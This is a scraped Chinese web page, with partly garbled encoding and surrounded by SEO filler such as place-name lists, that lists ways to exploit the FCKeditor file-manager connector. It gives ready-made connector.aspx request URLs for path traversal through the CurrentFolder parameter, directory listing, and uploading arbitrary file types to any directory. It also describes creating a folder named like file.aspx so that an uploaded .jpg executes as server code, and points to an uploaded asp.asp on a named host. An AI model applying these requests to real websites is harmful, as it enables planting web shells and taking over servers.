佳木斯湛栽影视文化发展公司
主頁 > 知識庫 > FCKeditor 新聞組件的一些程序漏洞

FCKeditor 新聞組件的一些程序漏洞
熱門標(biāo)簽:美圖手機(jī) 服務(wù)器配置 智能手機(jī) 網(wǎng)站文章發(fā)布 銀行業(yè)務(wù) 檢查注冊表項 鐵路電話系統(tǒng) 呼叫中心市場需求
1 CurrentFolder 參數(shù),可以在網(wǎng)站中不同目錄新建文件夾,參數(shù)使用 ../../來篡改參數(shù),進(jìn)入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolderType=ImageCurrentFolder=../../..%2FNewFolderName=aspx.asp


2 CurrentFolder 參數(shù),根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄,比如 “../../../”進(jìn)入不同的目錄,讓后通過XML返回的消息就可以看到?jīng)]有權(quán)限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFilesType=ImageCurrentFolder=%2F

3 上傳文件時,通過修改CurrentFolder參數(shù),可以將文件上傳到不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=FileUploadType=ImageCurrentFolder=%2F

4 同時修改Type 和CurrentFolder 參數(shù),可以上傳任意類型文件到網(wǎng)站任意目錄,基本上網(wǎng)站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUploadType=ImageCurrentFolder=%2F

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp



5 通過創(chuàng)建文件夾的功能,創(chuàng)建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執(zhí)行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執(zhí)行。

標(biāo)簽:樂山 長治 河南 滄州 紅河 沈陽 上海 新疆

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《FCKeditor 新聞組件的一些程序漏洞》,本文關(guān)鍵詞  ;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 收縮
    • 微信客服
    • 微信二維碼

    • 電話咨詢

    • 400-1100-266
    凭祥市| 汽车| 蒙自县| 陈巴尔虎旗| 屏山县| 榕江县| 龙口市| 满洲里市| 塔城市| 钟祥市| 卢龙县| 汶上县| 交口县| 离岛区| 东台市| 民勤县| 黑山县| 获嘉县| 东乌| 微博| 缙云县| 双峰县| 谷城县| 张家港市| 合山市| 北海市| 沁阳市| 宁安市| 东辽县| 凤庆县| 鄂尔多斯市| 衡阳市| 盱眙县| 三原县| 眉山市| 和平县| 兴业县| 噶尔县| 郸城县| 拉萨市| 迭部县|